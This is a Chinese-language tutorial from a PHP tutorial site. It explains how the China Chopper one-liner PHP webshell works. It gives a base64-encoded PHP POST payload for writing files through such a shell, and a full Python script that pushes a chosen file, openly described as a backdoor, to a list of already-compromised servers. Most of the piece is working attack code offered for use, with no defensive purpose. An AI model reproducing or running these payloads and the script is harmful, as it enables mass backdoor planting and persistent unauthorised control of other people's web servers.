PHP實(shí)現(xiàn)批量上傳單個(gè)文件

2020-03-22 19:28:08

字體：大中小

供稿：網(wǎng)友

很多時(shí)候當(dāng)我們通過(guò)某個(gè)通用型RCE漏洞批量抓取了很多的webshell后，可能想要批量傳個(gè)后門(mén)以備后用。這時(shí)，我們不禁會(huì)面臨一個(gè)問(wèn)題，使用菜刀一個(gè)個(gè)上傳顯得太慢，那么如何快速的實(shí)現(xiàn)文件的批量上傳呢？本文給大家介紹基于php如何實(shí)現(xiàn)這類(lèi)需求。0×01 原理分析首先，我們必須了解菜刀是如何通過(guò)一句話(huà)木馬來(lái)實(shí)現(xiàn)web服務(wù)器的文件管理的。下面是最常見(jiàn)的php一句話(huà)木馬： php eval($_POST[1]); 當(dāng)我們將一句話(huà)木馬上傳到web服務(wù)器上后，我們就可以直接在菜刀中輸入上面的密碼（如上例中的1）連接到服務(wù)器上來(lái)管理文件。那么，此處的菜刀如何通過(guò)簡(jiǎn)單的一句話(huà)就可以實(shí)現(xiàn)對(duì)服務(wù)器的管理和控制呢？通過(guò)分析菜刀的原理，我們不難發(fā)現(xiàn)菜刀是利用了eval這個(gè)函數(shù)來(lái)執(zhí)行通過(guò)POST方法傳過(guò)來(lái)的命令語(yǔ)句。因此，如果我們想通過(guò)菜刀一句話(huà)木馬來(lái)實(shí)現(xiàn)文件上傳的話(huà)，只需要向遠(yuǎn)程服務(wù)里上包含一句話(huà)的url發(fā)送一個(gè)帶文件寫(xiě)入命令的POST請(qǐng)求即可，比如：POST:1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];上面代碼包含2個(gè)部分：1. 一句話(huà)的密碼2. 發(fā)送給服務(wù)器端的php執(zhí)行代碼既然知道原理了，我們只需要發(fā)送如下的POST請(qǐng)求即可完成利用一句話(huà)上傳文件的功能：POST:1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh仔細(xì)分析一下這段POST數(shù)據(jù)包含以下幾個(gè)部分：1. 首先是php一句話(huà)的密碼12. 通過(guò)eval方法來(lái)執(zhí)行base64解碼后的z0，解碼整理后顯示如下：@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("- ;$f=base64_decode($_POST["z1"]);$c=base64_decode($_POST["z2"]);$c=str_replace("/r","",$c);$c=str_replace("/n","",$c);$buf="";for($i=0;$i strlen($c);$i+=1) $buf.=substr($c,$i,1);echo(@fwrite(fopen($f,"w"),$buf));echo("| die();3. 在z0中繼續(xù)調(diào)用base64解碼后的z1和z2，解碼后如下：z1=/var/www/root/1.txtz2=hello world!至此，我們可以很清楚的發(fā)現(xiàn)上面的POST請(qǐng)求的作用實(shí)際上是將一個(gè)寫(xiě)有hello world！的名為1.txt的文件上傳至服務(wù)器上/var/www/root/路徑下。0×02 代碼實(shí)現(xiàn)基于上面的原理分析，我們可以利用下面的代碼基于php一句話(huà)來(lái)實(shí)現(xiàn)文件批量上傳：#!/usr/bin/python #coding=utf-8 import urllib import urllib2import sysimport base64import redef post(url, data): req = urllib2.Request(url) data = urllib.urlencode(data) opener = urllib2.build_opener(urllib2.HTTPhtml' target='_blank'>CookieProcessor()) response = opener.open(req, data) return response.read() def get_shell_path(posturl,passwd): shell_path = "" try: data = {} data[passwd] = '@eval(base64_decode($_POST[z0]));' data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' shell_path = post(posturl, data).strip() except Exception: pass return shell_pathdef main(): print '/n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++/n' shellfile = sys.argv[1] # 存放webshell路徑和密碼的文件 localfile = sys.argv[2] # 本地待上傳的文件名 shell_file = open(shellfile,'rb') local_content = str(open(localfile,'rb').read()) for eachline in shell_file: posturl = eachline.split(',')[0].strip() passwd = eachline.split(',')[1].strip() try: reg = ".*/([^/]*/.php )" match_shell_name = re.search(reg,eachline) if match_shell_name: shell_name=match_shell_name.group(1) shell_path = get_shell_path(posturl,passwd).strip() target_path = shell_path.split(shell_name)[0]+localfile target_path_base64 = base64.b64encode(target_path) target_file_url = eachline.split(shell_name)[0]+localfile data = {} data[passwd] = '@eval(base64_decode($_POST[z0]));' data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7' data['z1']=target_path_base64 data['z2']=base64.b64encode(local_content) response = post(posturl, data) if response: print '[+] '+target_file_url+', upload succeed!' else: print '[-] '+target_file_url+', upload failed!' else: print '[-] '+posturl+', unsupported webshell!' except Exception,e: print '[-] '+posturl+', connection failed!' shell_file.close()if __name__ == '__main__': main()webshell.txt的格式: [一句話(huà)webshell文件路徑],[webshell連接密碼]如下：http://www.example1.com/1.php, 1http://www.example2.com/1.php, 1http://www.example3.com/1.php, 1保存上面腳本為batch_upload_file.py，執(zhí)行命令python batch_upload_file.py webshell.txt 1.txt，效果顯示如下：
以上內(nèi)容給大家介紹了PHP實(shí)現(xiàn)批量上傳單個(gè)文件的相關(guān)知識(shí)，希望大家喜歡。PHP教程

鄭重聲明：本文版權(quán)歸原作者所有，轉(zhuǎn)載文章僅為傳播更多信息之目的，如作者信息標(biāo)記有誤，請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除，多謝。

上一篇：PHP制作百度詞典查詞采集器

下一篇：php數(shù)組函數(shù)有哪些操作？php數(shù)組函數(shù)的應(yīng)用（附